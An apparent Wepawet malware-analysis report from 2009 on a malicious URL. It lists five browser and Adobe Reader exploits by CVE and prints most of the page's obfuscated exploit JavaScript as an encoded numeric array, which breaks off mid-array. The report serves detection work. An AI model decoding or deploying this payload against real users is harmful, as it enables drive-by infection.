Wepawet » JavaScript Report for http://geroyvoin.cn/1/show.php?s=747bbfed51

Analysis report for http://geroyvoin.cn/1/show.php?s=747bbfed51

Sample Overview

URL	http://geroyvoin.cn/1/show.php?s=747bbfed51
MD5	c0111429a935628b86fb7be697fc2838
Analysis Started	2009-09-09 14:19:55
Report Generated	2009-09-09 14:20:10
Jsand version	1.03.02

See the report for domain geroyvoin.cn.

Detection results

Detector	Result
Jsand 1.03.02	malicious

Exploits

Name	Description	Reference
Office Snapshot Viewer	The Microsoft Office Snapshot Viewer ActiveX control allows remote attackers to download arbitrary files to a client machine	CVE-2008-2463
Adobe Collab overflow	Multiple Adobe Reader and Acrobat buffer overflows	CVE-2007-5659
Adobe util.printf overflow	Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf	CVE-2008-2992
Adobe getIcon	Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object	CVE-2009-0927
MsVidCtl Overflow	Overflow in Microsoft Video ActiveX Control via specially-crafted data parameter	CVE-2008-0015

Deobfuscation results

Evals

var dkstv = [219, 239, 190, 207, 191, 215, 211, 227, 154, 147, 212, 176, 209, 207, 190, 
202, 120, 149, 198, 228, 197, 231, 154, 194, 209, 188, 171, 210, 234, 230, 188, 167, 191, 
224, 221, 240, 236, 181, 221, 136, 220, 201, 236, 154, 145, 207, 191, 215, 218, 218, 210, 
159, 206, 181, 211, 199, 233, 162, 114, 185, 190, 230, 209, 225, 172, 126, 196, 152, 186, 
172, 201, 206, 160, 142, 116, 169, 225, 216, 219, 196, 207, 179, 150, 201, 158, 245, 196, 
222, 196, 233, 214, 218, 235, 141, 218, 176, 229, 132, 182, 221, 196, 213, 193, 211, 188, 
196, 220, 186, 209, 174, 226, 140, 151, 199, 185, 207, 189, 221, 215, 228, 224, 196, 154, 
163, 187, 176, 189, 206, 164, 188, 109, 151, 159, 242, 221, 177, 224, 174, 214, 140, 218, 
163, 203, 224, 189, 231, 223, 231, 223, 193, 169, 185, 211, 219, 149, 210, 157, 184, 147, 
226, 216, 229, 204, 181, 221, 192, 211, 215, 233, 162, 121, 167, 200, 209, 197, 233, 221, 
184, 148, 176, 151, 223, 242, 247, 205, 118, 180, 212, 140, 231, 223, 193, 169, 136, 220, 
217, 225, 230, 121, 222, 176, 226, 217, 231, 232, 112, 210, 172, 218, 215, 218, 181, 194, 
209, 188, 156, 211, 229, 223, 190, 148, 109, 181, 169, 201, 156, 124, 142, 122, 159, 147, 
232, 226, 191, 227, 121, 222, 204, 229, 185, 183, 209, 191, 205, 197, 223, 219, 200, 169, 
124, 148, 214, 178, 156, 123, 185, 172, 226, 204, 163, 236, 177, 218, 175, 221, 209, 157, 
163, 124, 210, 172, 218, 215, 218, 163, 139, 222, 176, 223, 146, 232, 223, 190, 208, 115, 
220, 217, 225, 230, 121, 167, 180, 212, 140, 231, 223, 193, 154, 189, 211, 215, 229, 233, 
190, 223, 176, 194, 201, 237, 238, 141, 169, 109, 159, 134, 158, 245, 194, 209, 191, 227, 
214, 227, 154, 196, 222, 192, 211, 159, 242, 223, 188, 223, 176, 233, 214, 218, 238, 197, 
222, 185, 142, 202, 214, 230, 195, 209, 134, 235, 225, 127, 224, 197, 218, 174, 226, 205, 
228, 232, 112, 175, 186, 219, 212, 225, 223, 196, 209, 115, 151, 223, 232, 223, 196, 192, 
180, 219, 201, 228, 239, 196, 148, 114, 218, 211, 216, 219, 196, 213, 186, 220, 146, 221, 
236, 181, 210, 107, 171, 132, 151, 226, 196, 224, 187, 168, 147, 164, 219, 195, 215, 121, 
209, 211, 226, 156, 119, 152, 124, 158, 148, 165, 170, 121, 167, 200, 120, 202, 234, 232, 
179, 224, 180, 221, 210, 149, 222, 185, 222, 176, 209, 216, 232, 226, 191, 227, 115, 151, 
223, 235, 219, 194, 140, 190, 214, 201, 225, 230, 179, 219, 175, 211, 161, 234, 232, 181, 
223, 174, 207, 212, 218, 162, 114, 145, 192, 177, 148, 168, 173, 117, 225, 131, 176, 154, 
169, 159, 197, 159, 123, 162, 148, 154, 239, 128, 175, 130, 166, 137, 234, 174, 128, 164, 
141, 147, 217, 173, 188, 128, 175, 112, 227, 149, 184, 177, 128, 145, 192, 166, 166, 182, 
190, 117, 225, 123, 166, 153, 173, 159, 197, 156, 132, 179, 166, 154, 239, 132, 156, 131, 
176, 137, 234, 178, 148, 159, 127, 147, 217, 172, 189, 132, 156, 112, 227, 153, 173, 178, 
146, 145, 192, 164, 165, 168, 189, 117, 225, 128, 175, 152, 169, 159, 197, 177, 125, 178, 
149, 154, 239, 149, 158, 125, 176, 137, 234, 191, 147, 164, 141, 147, 217, 169, 192, 149, 
174, 112, 227, 153, 167, 175, 145, 145, 192, 179, 165, 173, 173, 117, 225, 131, 167, 153, 
171, 159, 197, 156, 127, 163, 153, 154, 239, 133, 163, 128, 164, 137, 234, 177, 131, 164, 
141, 147, 217, 173, 188, 131, 175, 112, 227, 151, 168, 177, 132, 145, 192, 158, 151, 172, 
178, 117, 225, 128, 164, 170, 168, 159, 197, 163, 129, 166, 166, 154, 239, 128, 159, 125, 
158, 137, 234, 173, 131, 178, 126, 147, 217, 169, 179, 147, 165, 112, 227, 152, 166, 175, 
128, 145, 192, 161, 151, 182, 190, 117, 225, 126, 164, 170, 187, 159, 197, 174, 144, 158, 
170, 154, 239, 128, 159, 124, 162, 137, 234, 192, 130, 159, 131, 147, 217, 165, 178, 135, 
160, 112, 227, 167, 187, 189, 129, 145, 192, 158, 151, 165, 190, 117, 225, 127, 158, 170, 
182, 159, 197, 177, 145, 179, 166, 154, 239, 131, 174, 128, 166, 137, 234, 177, 133, 178, 
131, 147, 217, 170, 191, 149, 161, 112, 227, 152, 171, 178, 146, 145, 192, 158, 151, 167, 
174, 117, 225, 129, 164, 167, 168, 159, 197, 156, 142, 166, 166, 154, 239, 136, 174, 127, 
166, 137, 234, 171, 147, 161, 129, 147, 217, 185, 173, 128, 159, 112, 227, 148, 169, 178, 
146, 145, 192, 158, 151, 173, 187, 117, 225, 128, 180, 167, 168, 159, 197, 161, 123, 163, 
169, 154, 239, 136, 176, 142, 161, 137, 234, 170, 136, 163, 143, 147, 217, 170, 172, 133, 
163, 112, 227, 151, 168, 188, 136, 145, 192, 166, 165, 184, 187, 117, 225, 144, 166, 153, 
183, 159, 197, 178, 145, 175, 150, 154, 239, 150, 178, 145, 180, 137, 234, 189, 128, 159, 
125, 147, 217, 187, 177, 136, 174, 112, 227, 165, 186, 192, 130, 145, 192, 176, 156, 169, 
192, 117, 225, 125, 179, 154, 170, 159, 197, 163, 131, 164, 153, 154, 239, 134, 162, 140, 
176, 137, 234, 176, 134, 165, 131, 147, 217, 168, 173, 145, 174, 112, 227, 166, 173, 189, 
128, 145, 192, 164, 152, 171, 171, 117, 225, 123, 158, 148, 165, 159, 197, 162, 131, 163, 
148, 154, 239, 134, 164, 128, 162, 137, 234, 176, 133, 163, 125, 147, 217, 167, 174, 131, 
161, 112, 227, 154, 174, 171, 147, 145, 192, 163, 148, 172, 174, 117, 225, 128, 161, 153, 
169, 159, 197, 173, 140, 176, 156, 154, 239, 128, 176, 145, 177, 137, 234, 192, 150, 163, 
142, 147, 217, 165, 174, 133, 161, 112, 227, 170, 173, 178, 146, 145, 192, 177, 152, 173, 
173, 117, 225, 141, 158, 148, 184, 159, 197, 164, 140, 164, 167, 154, 239, 137, 164, 144, 
158, 137, 234, 176, 136, 161, 123, 147, 217, 171, 191, 134, 178, 112, 227, 154, 169, 172, 
149, 145, 192, 165, 153, 171, 178, 117, 225, 129, 177, 155, 167, 159, 197, 161, 127, 164, 
168, 154, 239, 136, 177, 141, 166, 137, 234, 170, 149, 160, 144, 147, 217, 187, 192, 149, 
175, 112, 227, 148, 169, 175, 133, 145, 192, 163, 148, 174, 173, 117, 225, 142, 158, 151, 
168, 159, 197, 161, 123, 163, 148, 154, 239, 136, 174, 128, 164, 137, 234, 170, 132, 161, 
128, 147, 217, 184, 172, 136, 159, 112, 227, 156, 168, 177, 150, 145, 192, 162, 167, 184, 
172, 117, 225, 128, 158, 153, 167, 159, 197, 159, 129, 176, 156, 154, 239, 130, 178, 124, 
175, 137, 234, 192, 150, 163, 123, 147, 217, 165, 174, 133, 161, 112, 227, 153, 172, 175, 
146, 145, 192, 176, 156, 170, 176, 117, 225, 145, 179, 157, 173, 159, 197, 156, 144, 166, 
165, 154, 239, 133, 161, 145, 180, 137, 234, 176, 145, 156, 127, 147, 217, 187, 192, 128, 
156, 112, 227, 154, 173, 190, 135, 145, 192, 165, 152, 172, 174, 117, 225, 126, 175, 155, 
165, 159, 197, 158, 145, 160, 170, 154, 239, 134, 161, 129, 165, 137, 234, 176, 150, 163, 
125, 147, 217, 172, 176, 135, 165, 112, 227, 154, 174, 176, 150, 145, 192, 160, 169, 171, 
191, 117, 225, 129, 179, 154, 168, 159, 197, 159, 124, 160, 170, 154, 239, 134, 158, 125, 
180, 137, 234, 176, 133, 162, 127, 147, 217, 172, 171, 135, 156, 112, 227, 151, 167, 177, 
130, 145, 192, 164, 153, 167, 191, 117, 225, 129, 163, 155, 173, 159, 197, 156, 123, 158, 
148, 151, 163, 139, 226, 172, 224, 132, 215, 227, 183, 206, 183, 221, 199, 224, 183, 197, 
218, 176, 225, 199, 214, 234, 181, 148, 109, 147, 217, 174, 170, 137, 156, 112, 227, 157, 
165, 179, 128, 142, 116, 169, 218, 214, 236, 112, 212, 176, 207, 200, 218, 236, 195, 213, 
197, 211, 161, 167, 170, 139, 226, 172, 224, 132, 232, 230, 177, 207, 182, 225, 212, 214, 
221, 181, 169, 179, 211, 197, 217, 223, 194, 223, 180, 232, 201, 160, 237, 184, 209, 183, 
218, 199, 228, 222, 181, 154, 183, 211, 210, 220, 238, 184, 167, 194, 214, 205, 225, 223, 
120, 206, 180, 213, 198, 225, 233, 179, 215, 121, 218, 201, 227, 225, 196, 212, 135, 225, 
208, 214, 221, 187, 223, 187, 207, 199, 218, 163, 178, 213, 178, 208, 208, 228, 221, 187, 
151, 136, 208, 205, 220, 220, 188, 219, 174, 217, 159, 235, 219, 194, 140, 177, 215, 208, 
225, 220, 188, 219, 174, 217, 161, 215, 227, 183, 206, 183, 221, 199, 224, 168, 195, 225, 
173, 225, 216, 231, 227, 190, 211, 115, 158, 144, 232, 230, 177, 207, 182, 225, 212, 214, 
221, 181, 149, 134, 228, 197, 231, 154, 178, 216, 186, 209, 207, 178, 220, 185, 211, 173, 
218, 211, 216, 229, 126, 223, 192, 208, 215, 233, 236, 185, 218, 178, 150, 148, 161, 220, 
185, 211, 173, 218, 211, 216, 229, 126, 216, 176, 220, 203, 233, 226, 125, 223, 183, 207, 
199, 224, 237, 192, 205, 174, 211, 141, 176, 241, 184, 213, 183, 211, 140, 215, 230, 191, 
207, 182, 156, 208, 218, 232, 183, 224, 179, 153, 215, 225, 219, 179, 215, 190, 222, 197, 
216, 223, 140, 156, 195, 161, 148, 165, 170, 128, 149, 198, 208, 208, 228, 221, 187, 169, 
173, 218, 211, 216, 229, 123, 206, 183, 221, 199, 224, 165, 182, 213, 183, 218, 198, 225, 
233, 179, 215, 134, 235, 110, 235, 219, 194, 140, 184, 211, 209, 228, 236, 201, 169, 185, 
211, 219, 149, 187, 194, 222, 172, 231, 140, 158, 181, 182, 219, 189, 150, 218, 214, 236, 
112, 213, 136, 158, 159, 222, 182, 131, 156, 123, 169, 205, 160, 165, 121, 231, 184, 211, 
209, 228, 236, 201, 199, 180, 203, 161, 215, 230, 191, 207, 182, 153, 215, 221, 223, 188, 
216, 174, 221, 200, 218, 181, 205, 118, 191, 224, 221, 240, 240, 177, 222, 107, 221, 198, 
223, 183, 180, 219, 174, 227, 209, 218, 232, 196, 154, 174, 224, 201, 214, 238, 181, 177, 
183, 211, 209, 218, 232, 196, 148, 114, 221, 198, 223, 223, 179, 224, 114, 151, 159, 217, 
233, 179, 225, 184, 211, 210, 233, 168, 178, 219, 175, 231, 146, 214, 234, 192, 209, 185, 
210, 167, 221, 227, 188, 208, 115, 221, 198, 223, 163, 139, 219, 173, 216, 146, 236, 227, 
180, 224, 179, 171, 139, 166, 161, 139, 219, 173, 216, 146, 221, 223, 185, 211, 179, 226, 
161, 156, 171, 119, 167, 186, 208, 206, 163, 222, 177, 224, 172, 171, 139, 163, 169, 179, 
219, 190, 230, 146, 222, 234, 183, 147, 134, 221, 198, 223, 168, 179, 216, 172, 225, 215, 
222, 222, 141, 147, 174, 218, 215, 222, 222, 138, 156, 132, 163, 153, 182, 189, 134, 158, 
120, 176, 170, 167, 191, 125, 160, 142, 176, 165, 162, 187, 130, 174, 132, 155, 165, 171, 
173, 150, 163, 130, 160, 168, 169, 176, 147, 178, 114, 169, 215, 218, 238, 164, 213, 184, 
211, 211, 234, 238, 120, 220, 175, 212, 140, 158, 166, 133, 156, 123, 151, 159, 242, 221, 
177, 224, 174, 214, 140, 218, 163, 203, 220, 175, 212, 140, 158, 181, 205, 233, 85, 212, 
217, 227, 221, 196, 213, 186, 220, 132, 229, 222, 182, 148, 116, 233, 218, 214, 236, 112, 
213, 190, 183, 210, 232, 238, 177, 216, 183, 211, 200, 178, 224, 177, 216, 190, 211, 159, 
222, 224, 120, 218, 172, 228, 205, 220, 219, 196, 219, 189, 156, 212, 225, 239, 183, 213, 
185, 225, 138, 155, 232, 177, 226, 180, 213, 197, 233, 233, 194, 154, 187, 218, 217, 220, 
227, 190, 223, 121, 218, 201, 227, 225, 196, 212, 116, 233, 202, 228, 236, 120, 226, 172, 
224, 132, 237, 183, 128, 167, 195, 170, 210, 214, 240, 185, 211, 172, 226, 211, 231, 168, 
192, 216, 192, 213, 205, 227, 237, 126, 216, 176, 220, 203, 233, 226, 139, 228, 118, 153, 
141, 240, 227, 182, 148, 185, 207, 218, 222, 225, 177, 224, 186, 224, 146, 229, 230, 197, 
211, 180, 220, 215, 208, 242, 173, 154, 175, 211, 215, 216, 236, 185, 220, 191, 215, 211, 
227, 168, 185, 218, 175, 211, 220, 196, 224, 120, 147, 140, 210, 211, 215, 223, 112, 173, 
174, 224, 211, 215, 219, 196, 147, 116, 143, 161, 162, 171, 121, 231, 180, 225, 173, 227, 
237, 196, 205, 183, 218, 201, 217, 183, 196, 222, 192, 211, 159, 215, 236, 181, 205, 182, 
169, 225, 127, 227, 182, 148, 185, 207, 218, 222, 225, 177, 224, 186, 224, 146, 229, 230, 
197, 211, 180, 220, 215, 208, 242, 173, 154, 175, 211, 215, 216, 236, 185, 220, 191, 215, 
211, 227, 168, 185, 218, 175, 211, 220, 196, 224, 120, 147, 140, 210, 211, 215, 223, 112, 
188, 143, 180, 139, 158, 155, 141, 153, 124, 151, 223, 222, 237, 153, 218, 190, 226, 197, 
225, 230, 181, 208, 136, 226, 214, 234, 223, 139, 206, 189, 211, 197, 224, 181, 205, 233, 
200, 211, 208, 232, 223, 112, 213, 177, 150, 219, 222, 232, 180, 219, 194, 156, 165, 216, 
238, 185, 226, 176, 198, 179, 215, 228, 181, 207, 191, 151, 223, 235, 219, 194, 140, 174, 
221, 210, 233, 236, 191, 216, 136, 220, 217, 225, 230, 139, 224, 189, 231, 223, 216, 233, 
190, 224, 189, 221, 208, 178, 232, 181, 227, 107, 175, 199, 233, 227, 198, 209, 163, 189, 
198, 223, 223, 179, 224, 115, 149, 165, 216, 236, 191, 188, 143, 180, 146, 197, 190, 150, 
147, 116, 169, 225, 216, 219, 196, 207, 179, 150, 201, 158, 245, 205, 118, 180, 212, 140, 
150, 221, 191, 218, 191, 224, 211, 225, 163, 203, 224, 189, 231, 223, 216, 233, 190, 224, 
189, 221, 208, 178, 232, 181, 227, 107, 175, 199, 233, 227, 198, 209, 163, 189, 198, 223, 
223, 179, 224, 115, 149, 180, 185, 192, 126, 188, 175, 212, 167, 233, 236, 188, 147, 116, 
169, 225, 216, 219, 196, 207, 179, 150, 201, 158, 245, 205, 233, 85, 215, 202, 157, 221, 
191, 218, 191, 224, 211, 225, 163, 203, 213, 190, 183, 210, 232, 238, 177, 216, 183, 211, 
200, 178, 238, 194, 225, 176, 169, 225, 242, 132, 185, 210, 115, 215, 215, 190, 232, 195, 
224, 172, 218, 208, 218, 222, 121, 231, 193, 207, 214, 149, 239, 177, 169, 185, 207, 218, 
222, 225, 177, 224, 186, 224, 146, 234, 237, 181, 222, 140, 213, 201, 227, 238, 126, 224, 
186, 186, 211, 236, 223, 194, 175, 172, 225, 201, 157, 163, 139, 213, 177, 150, 217, 214, 
168, 185, 218, 175, 211, 220, 196, 224, 120, 142, 177, 215, 214, 218, 224, 191, 228, 109, 
151, 133, 178, 167, 129, 149, 198, 228, 197, 231, 154, 184, 220, 192, 232, 161, 217, 233, 
179, 225, 184, 211, 210, 233, 168, 179, 222, 176, 207, 216, 218, 191, 188, 209, 184, 211, 
210, 233, 162, 119, 209, 184, 208, 201, 217, 161, 121, 167, 179, 222, 217, 239, 168, 195, 
209, 191, 175, 216, 233, 236, 185, 206, 192, 226, 201, 157, 161, 195, 222, 174, 149, 144, 
156, 168, 127, 207, 176, 213, 209, 228, 234, 194, 227, 195, 156, 212, 217, 224, 119, 149, 
134, 214, 212, 234, 244, 126, 223, 176, 226, 165, 233, 238, 194, 213, 173, 227, 216, 218, 
162, 119, 212, 189, 211, 202, 156, 166, 119, 154, 122, 209, 201, 220, 231, 191, 220, 189, 
229, 220, 163, 234, 180, 210, 114, 151, 159, 221, 234, 197, 230, 121, 225, 201, 233, 187, 
196, 224, 189, 215, 198, 234, 238, 181, 148, 114, 226, 221, 229, 223, 119, 152, 114, 207, 
212, 229, 230, 185, 207, 172, 226, 205, 228, 232, 127, 220, 175, 212, 139, 158, 181, 184, 
220, 192, 232, 146, 232, 223, 196, 173, 191, 226, 214, 222, 220, 197, 224, 176, 150, 139, 
236, 227, 180, 224, 179, 149, 144, 167, 170, 128, 149, 134, 214, 212, 234, 244, 126, 223, 
176, 226, 165, 233, 238, 194, 213, 173, 227, 216, 218, 162, 119, 212, 176, 215, 203, 221, 
238, 119, 152, 125, 158, 148, 158, 181, 184, 220, 192, 232, 146, 232, 223, 196, 173, 191, 
226, 214, 222, 220, 197, 224, 176, 150, 139, 232, 238, 201, 216, 176, 149, 144, 156, 222, 
185, 223, 187, 218, 197, 238, 180, 190, 219, 185, 211, 159, 156, 163, 139, 208, 186, 209, 
217, 226, 223, 190, 224, 121, 208, 211, 217, 243, 126, 205, 187, 222, 201, 227, 222, 147, 
212, 180, 218, 200, 157, 226, 192, 225, 197, 151, 159, 242, 223, 188, 223, 176, 233, 218, 
214, 236, 112, 212, 187, 227, 222, 178, 222, 191, 207, 192, 219, 201, 227, 238, 126, 207, 
189, 211, 197, 233, 223, 149, 216, 176, 219, 201, 227, 238, 120, 147, 180, 212, 214, 214, 
231, 181, 147, 116, 169, 204, 229, 239, 202, 154, 190, 211, 216, 182, 238, 196, 222, 180, 
208, 217, 233, 223, 120, 147, 190, 224, 199, 156, 166, 119, 154, 122, 209, 201, 220, 231, 
191, 220, 189, 229, 220, 163, 234, 180, 210, 114, 151, 159, 221, 234, 197, 230, 121, 225, 
201, 233, 187, 196, 224, 189, 215, 198, 234, 238, 181, 148, 114, 229, 205, 217, 238, 184, 
147, 119, 160, 148, 165, 163, 139, 212, 187, 227, 222, 163, 237, 181, 224, 140, 226, 216, 
231, 227, 178, 225, 191, 211, 140, 156, 226, 181, 213, 178, 214, 216, 156, 166, 130, 156, 
123, 151, 159, 221, 234, 197, 230, 121, 225, 201, 233, 187, 196, 224, 189, 215, 198, 234, 
238, 181, 148, 114, 225, 216, 238, 230, 181, 147, 119, 149, 200, 222, 237, 192, 216, 172, 
231, 158, 227, 233, 190, 209, 134, 149, 141, 176, 222, 191, 207, 192, 219, 201, 227, 238, 
126, 206, 186, 210, 221, 163, 219, 192, 220, 176, 220, 200, 184, 226, 185, 216, 175, 150, 
204, 229, 239, 202, 149, 134, 235, 110, 232, 223, 196, 192, 180, 219, 201, 228, 239, 196, 
148, 177, 218, 197, 232, 226, 120, 149, 119, 159, 153, 165, 170, 121, 167, 189, 211, 216, 
234, 236, 190, 167, 200, 120, 202, 225, 219, 195, 212, 115, 151, 159, 231, 223, 196, 225, 
189, 220, 159, 242, 132, 182, 225, 185, 209, 216, 222, 233, 190, 140, 177, 218, 197, 232, 
226, 120, 149, 198, 228, 197, 231, 154, 160, 216, 172, 231, 201, 231, 208, 181, 222, 190, 
215, 211, 227, 183, 171, 156, 119, 158, 144, 165, 215, 139, 213, 177, 150, 210, 214, 240, 
185, 211, 172, 226, 211, 231, 168, 192, 216, 192, 213, 205, 227, 237, 118, 146, 185, 207, 
218, 222, 225, 177, 224, 186, 224, 146, 226, 227, 189, 209, 159, 231, 212, 218, 237, 126, 
216, 176, 220, 203, 233, 226, 121, 231, 193, 207, 214, 149, 242, 141, 218, 172, 228, 205, 
220, 219, 196, 219, 189, 156, 212, 225, 239, 183, 213, 185, 225, 191, 151, 205, 184, 219, 
174, 217, 219, 214, 240, 181, 140, 145, 218, 197, 232, 226, 114, 201, 134, 215, 202, 157, 
242, 118, 146, 195, 156, 200, 218, 237, 179, 222, 180, 222, 216, 222, 233, 190, 149, 198, 
190, 208, 214, 243, 181, 222, 161, 211, 214, 232, 227, 191, 218, 136, 230, 146, 217, 223, 
195, 207, 189, 215, 212, 233, 227, 191, 218, 121, 224, 201, 229, 230, 177, 207, 176, 150, 
147, 157, 213, 177, 153, 197, 175, 145, 207, 215, 204, 200, 190, 151, 143, 164, 166, 114, 
142, 116, 156, 214, 218, 234, 188, 205, 174, 211, 140, 164, 162, 172, 223, 118, 224, 224, 
209, 237, 123, 206, 166, 158, 145, 174, 215, 123, 149, 122, 154, 134, 163, 156, 121, 154, 
190, 222, 208, 222, 238, 120, 142, 121, 144, 141, 176, 247, 205, 209, 183, 225, 201, 240, 
238, 194, 229, 198, 228, 197, 231, 154, 182, 226, 136, 220, 201, 236, 154, 145, 207, 191, 
215, 218, 218, 210, 159, 206, 181, 211, 199, 233, 162, 114, 191, 179, 221, 199, 224, 241, 
177, 226, 176, 180, 208, 214, 237, 184, 154, 158, 214, 211, 216, 229, 199, 205, 193, 211, 
170, 225, 219, 195, 212, 121, 165, 134, 158, 181, 185, 210, 115, 212, 218, 150, 183, 190, 
225, 183, 218, 141, 240, 202, 188, 205, 196, 211, 214, 203, 223, 194, 223, 180, 221, 210, 
178, 224, 198, 154, 146, 211, 216, 203, 219, 194, 213, 172, 208, 208, 218, 162, 114, 200, 
111, 228, 201, 231, 237, 185, 219, 185, 144, 141, 163, 237, 192, 216, 180, 226, 140, 151, 
154, 114, 149, 166, 159, 193, 163, 237, 192, 216, 180, 226, 140, 151, 166, 114, 149, 134, 
235, 225, 216, 219, 196, 207, 179, 150, 201, 158, 245, 195, 218, 172, 222, 215, 221, 233, 
196, 148, 116, 169, 214, 218, 238, 197, 222, 185, 169, 225, 242, 132, 198, 205, 189, 142, 
218, 218, 236, 195, 213, 186, 220, 149, 178, 202, 188, 205, 196, 211, 214, 203, 223, 194, 
223, 180, 221, 210, 208, 170, 173, 141, 136, 220, 217, 225, 230, 143, 220, 172, 224, 215, 
218, 195, 190, 224, 115, 190, 208, 214, 243, 181, 222, 161, 211, 214, 232, 227, 191, 218, 
166, 158, 193, 158, 180, 128, 167, 193, 207, 214, 149, 240, 181, 222, 190, 215, 211, 227, 
172, 141, 188, 183, 207, 221, 218, 236, 166, 209, 189, 225, 205, 228, 232, 171, 157, 168, 
143, 161, 227, 239, 188, 216, 138, 222, 197, 231, 237, 181, 181, 185, 226, 140, 197, 230, 
177, 229, 176, 224, 186, 218, 236, 195, 213, 186, 220, 191, 166, 215, 121, 166, 123, 169, 
218, 214, 236, 112, 226, 176, 224, 215, 222, 233, 190, 159, 136, 190, 208, 214, 243, 181, 
222, 161, 211, 214, 232, 227, 191, 218, 166, 160, 193, 150, 183, 190, 225, 183, 218, 163, 
229, 219, 194, 223, 176, 183, 210, 233, 162, 160, 216, 172, 231, 201, 231, 208, 181, 222, 
190, 215, 211, 227, 213, 130, 201, 116, 168, 148, 176, 227, 182, 148, 193, 211, 214, 232, 
227, 191, 218, 124, 171, 161, 174, 160, 118, 226, 176, 224, 215, 222, 233, 190, 159, 135, 
159, 150, 169, 163, 203, 226, 172, 224, 132, 234, 219, 141, 218, 172, 228, 205, 220, 219, 
196, 219, 189, 156, 217, 232, 223, 194, 173, 178, 211, 210, 233, 168, 196, 219, 151, 221, 
219, 218, 236, 147, 205, 190, 211, 140, 158, 181, 185, 210, 115, 227, 197, 163, 227, 190, 
208, 176, 230, 179, 219, 162, 114, 210, 180, 224, 201, 219, 233, 200, 142, 116, 143, 161, 
162, 171, 121, 231, 193, 207, 214, 149, 237, 199, 210, 176, 218, 201, 226, 223, 190, 224, 
136, 210, 211, 216, 239, 189, 209, 185, 226, 146, 216, 236, 181, 205, 191, 211, 169, 225, 
223, 189, 209, 185, 226, 140, 156, 223, 189, 206, 176, 210, 139, 158, 181, 180, 219, 174, 
227, 209, 218, 232, 196, 154, 173, 221, 200, 238, 168, 177, 220, 187, 211, 210, 217, 189, 
184, 213, 183, 210, 140, 232, 241, 182, 209, 183, 211, 209, 218, 232, 196, 149, 134, 225, 
219, 219, 223, 188, 209, 184, 211, 210, 233, 168, 199, 213, 175, 226, 204, 178, 161, 129, 
147, 134, 225, 219, 219, 223, 188, 209, 184, 211, 210, 233, 168, 184, 209, 180, 213, 204, 
233, 183, 119, 157, 114, 169, 215, 236, 224, 181, 216, 176, 219, 201, 227, 238, 126, 223, 
189, 209, 161, 156, 168, 127, 217, 172, 220, 217, 214, 230, 126, 223, 194, 212, 139, 176, 
237, 199, 210, 176, 218, 201, 226, 223, 190, 224, 121, 226, 221, 229, 223, 141, 147, 172, 
222, 212, 225, 227, 179, 205, 191, 215, 211, 227, 169, 200, 153, 190, 214, 211, 216, 229, 
199, 205, 193, 211, 145, 219, 230, 177, 223, 179, 149, 159, 242, 223, 188, 223, 176, 233, 
218, 214, 236, 112, 223, 194, 212, 201, 225, 223, 189, 209, 185, 226, 161, 217, 233, 179, 
225, 184, 211, 210, 233, 168, 179, 222, 176, 207, 216, 218, 191, 188, 209, 184, 211, 210, 
233, 162, 119, 213, 177, 224, 197, 226, 223, 119, 149, 134, 225, 219, 219, 223, 188, 209, 
184, 211, 210, 233, 168, 195, 209, 191, 175, 216, 233, 236, 185, 206, 192, 226, 201, 157, 
161, 195, 222, 174, 149, 144, 156, 168, 127, 217, 172, 220, 217, 214, 230, 126, 223, 194, 
212, 139, 158, 181, 195, 227, 177, 211, 208, 218, 231, 181, 218, 191, 156, 215, 218, 238, 
145, 224, 191, 224, 205, 215, 239, 196, 209, 115, 149, 219, 222, 222, 196, 212, 114, 154, 
150, 165, 170, 121, 167, 190, 229, 202, 218, 230, 181, 217, 176, 220, 216, 163, 237, 181, 
224, 140, 226, 216, 231, 227, 178, 225, 191, 211, 140, 156, 226, 181, 213, 178, 214, 216, 
156, 166, 130, 156, 123, 151, 159, 232, 241, 182, 209, 183, 211, 209, 218, 232, 196, 154, 
190, 211, 216, 182, 238, 196, 222, 180, 208, 217, 233, 223, 120, 147, 190, 226, 221, 225, 
223, 119, 152, 114, 210, 205, 232, 234, 188, 205, 196, 168, 210, 228, 232, 181, 167, 114, 
151, 159, 217, 233, 179, 225, 184, 211, 210, 233, 168, 178, 219, 175, 231, 146, 214, 234, 
192, 209, 185, 210, 167, 221, 227, 188, 208, 115, 225, 219, 219, 223, 188, 209, 184, 211, 
210, 233, 163, 139, 233, 200, 120, 215, 227, 219, 192, 223, 179, 221, 216, 157, 163, 139, 
233, 85, 212, 217, 227, 221, 196, 213, 186, 220, 132, 232, 232, 177, 220, 190, 214, 211, 
233, 162, 121, 231, 193, 207, 214, 149, 242, 139, 226, 172, 224, 132, 228, 220, 186, 167, 
193, 207, 214, 149, 231, 201, 207, 172, 224, 215, 178, 232, 181, 227, 107, 175, 214, 231, 
219, 201, 148, 116, 169, 209, 238, 221, 177, 222, 190, 201, 148, 210, 183, 119, 207, 133, 
157, 180, 231, 233, 183, 222, 172, 219, 132, 187, 227, 188, 209, 190, 157, 179, 234, 238, 
188, 219, 186, 217, 132, 186, 242, 192, 222, 176, 225, 215, 164, 241, 177, 206, 121, 211, 
220, 218, 161, 139, 217, 196, 209, 197, 231, 237, 171, 157, 168, 171, 139, 217, 180, 127, 
188, 189, 221, 203, 231, 219, 189, 140, 145, 215, 208, 218, 237, 127, 187, 192, 226, 208, 
228, 233, 187, 140, 144, 230, 212, 231, 223, 195, 223, 122, 229, 197, 215, 168, 181, 228, 
176, 149, 159, 226, 243, 179, 205, 189, 225, 191, 167, 215, 141, 147, 176, 168, 147, 197, 
236, 191, 211, 189, 207, 209, 149, 192, 185, 216, 176, 225, 147, 196, 239, 196, 216, 186, 
221, 207, 149, 191, 200, 220, 189, 211, 215, 232, 169, 199, 205, 173, 156, 201, 237, 223, 
119, 167, 191, 224, 221, 240, 240, 177, 222, 107, 221, 198, 223, 183, 190, 209, 194, 142, 
165, 216, 238, 185, 226, 176, 198, 179, 215, 228, 181, 207, 191, 150, 139, 232, 232, 192, 
226, 194, 156, 183, 227, 219, 192, 223, 179, 221, 216, 149, 208, 185, 209, 194, 211, 214, 
149, 189, 191, 218, 191, 224, 211, 225, 168, 129, 147, 116, 169, 225, 216, 219, 196, 207, 
179, 150, 201, 158, 245, 196, 222, 196, 233, 218, 214, 236, 112, 219, 173, 216, 161, 217, 
233, 179, 225, 184, 211, 210, 233, 168, 179, 222, 176, 207, 216, 218, 191, 188, 209, 184, 
211, 210, 233, 162, 119, 219, 173, 216, 201, 216, 238, 119, 149, 134, 221, 198, 223, 168, 
